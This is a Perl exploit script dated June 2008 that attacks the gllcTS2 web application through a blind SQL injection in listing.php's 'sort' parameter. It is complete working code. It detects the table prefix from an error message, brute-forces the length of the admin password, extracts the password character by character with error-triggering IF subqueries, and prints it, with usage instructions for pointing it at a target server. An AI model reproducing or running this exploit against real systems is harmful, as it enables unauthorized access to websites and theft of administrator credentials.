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Posted on 14 June 2008

#!/usr/bin/perl ###################### # #gllcTS2 (listing.php $sort) Remote Blind SQL Injection Exploit # ###################### # #Bug by: h0yt3r # ## ### ## # #This one shows another vulnerability in the gllcTS2. (Thera are many with simple injections) #Same Versions are affected. #Also shows the conecpt of how to inject an ORDER BY statement via Blind Injection and #WITHOUT benchmark(), means we produce an error if the IF statement returns TRUE. # #Gr33tz go to: #b!zZ!t, ramon, thund3r, Free-Hack, Sys-Flaw and of course the neverdying h4ck-y0u Team # ################ use LWP::UserAgent; my $userAgent = LWP::UserAgent->new; usage(); $server = $ARGV[0]; $dir = $ARGV[1]; print" "; if (!$dir) { die "Read Usage! "; } $filename ="listing.php"; my $vulnCheck = "http://".$server.$dir.$filename; my $prefix =""; my @Daten = ("61","62","63","64","65","66","67","68","69","6A","6B","6C","6D","6E","6F","70","71","72","73","74","75","76","77","78","79","7A","3A","5F","31","32","33","34","35","36","37","38","39","30"); my $Attack= $userAgent->get($vulnCheck); if ($Attack->is_success) { print "[x]Attacking ".$vulnCheck." "; } else { print "Couldn't connect to ".$vulnCheck."!"; exit; } print "[x]Vulnerable Check:"; my $check = $vulnCheck."?sort='"; my $Attack= $userAgent->get($check); if($Attack->content =~ m/FROM (.*?)_weblist/i) { print " Vulnerable! "; $prefix = $1; } else { print " Not Vulnerable!"; exit; } my $hex=""; my $length; print "[x]Bruteforcing Length "; my $lengthCounter = 1; while(1) { #To inject ORDER BY (where we cannot union select) we just have to pass a simple IF statement. #Instead of Benchmark() we can use a subquery which, in this case, would return "Subquery returns more than 1 row" if the statement actualle is true. my $url = "".$vulnCheck."?sort=IF(LENGTH((select admin_pass from ".$prefix."_admin))=".$lengthCounter.",(select 1 union select 5),null)&direction=desc&showgroup=all"; my $Attack= $userAgent->get($url); my $content = $Attack->content; if($content =~ m/Please contact a the site admin immediately./i) { $length=$lengthCounter; last; } else { $lengthCounter++; } } print "[x]Injecting Black Magic "; for($b=1;$b<=$length;$b++) { for(my $u=0;$u<28;$u++) { my $url = "".$vulnCheck."?sort=IF(substring((select admin_pass from ".$prefix."_admin),".$b.",1)=0x".$Daten[$u].",(select 1 union select 5),null)&direction=desc&showgroup=all"; my $Attack= $userAgent->get($url); my $content = $Attack->content; if($content =~ m/Please contact a the site admin immediately./i) { print "[x] Found Char ".$Daten[$u]." "; $hex=$hex.$Daten[$u]; last; } else { #Whatever... } } } print "[x]Converting "; my $a_str = hex_to_ascii($hex); print "[x]Success! "; print " Adminpassword: $a_str "; sub hex_to_ascii ($) { (my $str = shift) =~ s/([a-fA-F0-9]{2})/chr(hex $1)/eg; return $str; } sub usage() { print q { ###################################################### gllcTS2 Remote Blind SQL Injection Exploit -Written by h0yt3r- Usage: gllcts2.pl [Server] [Path] Sample: perl gllcts2.pl www.site.com /cms/ ###################################################### }; }